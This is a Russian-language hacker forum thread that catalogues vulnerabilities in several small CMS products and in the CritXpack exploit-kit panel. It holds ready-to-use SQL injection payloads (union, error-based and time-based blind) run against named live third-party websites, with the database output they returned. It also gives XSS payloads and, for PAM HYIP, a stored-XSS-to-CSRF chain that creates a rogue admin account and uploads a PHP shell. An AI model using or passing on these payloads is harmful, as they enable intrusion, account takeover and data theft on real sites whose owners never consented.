Связка эксплойтов CritXpack Активная XSS в поле BackURL Для её работы нужно создать поток с .exe потом указать BackURL пример google.com/<script>alert('a')</script> Внимание, после указание BackURL у вас исчезнет статистика, браузеров, загрузок, уников, лоадов и прочее. Зато после проверки админом придёт его сессия.
Узнать версию Amiro.CMS Разработчик CMS: Amiro Номер версии: <=5.14.6(проверено на 5.14.6 и 5.8.4) Сайт: http://www.amiro.ru/ В коде страницы должен быть скрипт вида Code: <script type="text/javascript" src="http://127.0.0.1/system_js.php?script=imgclear&_hash=*MD5*&_cv=[COLOR=Red][B]5.14.6.6[/B][/COLOR]"></script> Значение переменной '_cv' - версия CMS. Так для 5.14.6 _cv=5.14.6.6, а для 5.8.4 _cv=5.8.4.0. Кроме того, попробуйте воспользоваться поиском по коду, ибо данная переменная много, где фигурирует. PS: Выложите на exploit-db по возможности, может пригодится в будущем.
SiteLeader CMS Цена: Стоимость услуг по разработке сайтов: 75 000 — 250 000 Сайт: www.siteleader.ru Тестировалось на версии 3.62 SQL Injection Code: /news/[COLOR=Green][VALIDNUMBER][/COLOR][COLOR=Red][SQLINJ][/COLOR] Пример реализации Code: http://www.juliavolkova.com/ru/news/[COLOR=Green]1[/COLOR][COLOR=Red]'[/COLOR] Code: http://www.juliavolkova.com/ru/news/[COLOR=Red]-[/COLOR][COLOR=Green]1[/COLOR][COLOR=Red]' union all select 1,2,concat(user(),0x3a,database()),4,5-- a[/COLOR] Ответ: VOLKOVA@LOCALHOST:VOLKOVA Code: http://krasimvse.ru/news/[COLOR=Green]1[/COLOR][COLOR=Red]'[/COLOR] Code: http://krasimvse.ru/news/[COLOR=Red]-[/COLOR][COLOR=Green]1[/COLOR][COLOR=Red]' union all select 1,2,concat(user(),0x3a,database()),4,5-- a[/COLOR] Ответ: kraskoteka@localhost:kraskoteka Админ-панель: /admin/login/ Стандартный логин: root При добавлении контента (в админ-панели) везде выполняется JS код. Найдено мной
CMS A4-site Сайт:www.a4-site.ru Демо-версия:www.demo.a4-site.ru Функциональность: От сайтов-визиток с минимальной функциональностью до проектов с посещаемостью в десятки и сотни тысяч посетителей в день. (c) Стоимость:Система управления сайтом A4-Site пока не продается "в коробке". Но вы можете заказать реализацию вашего проекта на ее основе в Интернет-компании A4-Site.(c) Исследования проводим на демо-версии. SQL Injection Уязвимый параметр: search_str Вектор: error-based Требования: mq = off Exploit:[http://demo.a4-site.ru/index.php?checksumm=193232&rubr=pages&page=search&search_str='and(extractvalue(1,concat(0x3a,version())))and'&search_cond=AND] Query: PHP: INSERT INTO distr_searchlog (sl_query,sl_count,sl_time,sl_cond) VALUES (''and(extractvalue(1,concat(0x3a,version())))and'',0,'0','AND') XSS (passive) Все тот же параметр search_str Exploit: [http://demo.a4-site.ru/index.php?checksumm=193232&rubr=pages&page=search&search_str="><img src=x onerror=alert('Antichat')>&search_cond=AND]
CMS Business Station Сайт:http://cms-bs.ru Стоимость:http://cms-bs.ru/configuration/ reflected XSS Уязвимость присутствует в форме авторизации - переменная login. PoC: отправляем пакет
CMS Shop-Rent Сайт: shop-rent.ru Time-Based Blind SQL Injection (pics.php): Code: pics.php?id=1[COLOR=Red]'+and+(select * from+(select(sleep(10)))x)+and--'1[/COLOR] XSS Code: pics.php?id=[COLOR=Red]"><script>alert();</script>[/COLOR] Примеры: Code: http://disloc.ru/pics.php?id=1' and (select * from (select(sleep(10)))x) and--'1 TRUE Code: http://bookcoffee.ru/pics.php?id=215' and (select * from (select(sleep(10)))x) and--'1 TRUE Таблица с администраторами: gd_main_users Таблица с остальными пользователями: gd_users Админ-панель: admin.site.ru
PAM HYIP Сайт: http://www.pamhyip.com/ Версия: 2014 Заливка шелла в админке (/admin/) Tools -> Banners. Таблица админов admin(колонки email, password). Алгоритм md5. Полностью дырявый скрипт, везде SQL-инъекции. 1. SQL-инъекция в gettogateway.php PHP: ...$gatewayid = $_POST['gatewayid']; $select = mysql_query("select * from `gateway_settings` where `status`='1' and gateway_id != '".$gatewayid."' "); ... Пример: Code: http://hyip/gettogateway.php POST: gatewayid=1' union select 1,concat_ws(0x3a,adminId,email,password),3,4,5,6,7 from admin-- t 2. XSS -> CSRF -> RCE После регистрации (index.php?pg=register) и авторизации на сайте, можно отправлять тикеты (index.php?pg=ticket). Поле Message принимает все и без каких-либо изменений показывается в админ-панеле (admin/index.php?pg=tickets). Код выполнится, когда админ откроет наш тикет. > Добавление нового админа Создаем новый тикет, вписав в поле Message следующий код: Code: <script> $(document).ready(function(){ $.ajax({ type:'POST', url:'/admin/index.php?pg=subadminValid', data: 'email=bbb%40aaa.aa&adminId=&password=123456&realname=aaaa&permission%5B%5D=Users&permission%5B%5D=Finance&permission%5B%5D=Reports&permission%5B%5D=Tools&permission%5B%5D=Support&permission%5B%5D=Settings&phoneno=12345652244&ipaddress=127.0.0.1&status=1&save=Submit', }); }); </script> Ключевыми являются параметры email, password и ipaddress. После открытия тикета создастся админ с юзернеймом [email protected] и паролем 123456. > Заливка шелла Создаем новый тикет, вписав в поле Message следующий код: Code: <script> $(document).ready(function(){ $.ajax({ type:'POST', url:'/admin/index.php?pg=headerbannervalid', contentType: 'multipart/form-data; boundary=1234567890', data: "--1234567890\r\nContent-Disposition: form-data; name=\"banner\"; filename=\"php.php\"\r\n\r\n<?php phpinfo();die();?>\r\n--1234567890--", }); }); </script> Уязвимый код в /admin/model/headimge.php: PHP: ...$image = date('Ymdhis').$_FILES['banner']['name']; move_uploaded_file($_FILES['banner']['tmp_name'],'../content/headercontent/'.$image); ... Файл сохранится как [YYYY][mm][dd](H)(i)(S)php.php. Например 20171201010149php.php. Это уже надо брутить. Файл будет записан по адресу http://hyip/content/headercontent/. P.S. Там уязвимостей очень много, думаю будет интересно покопаться, особенно начинающим
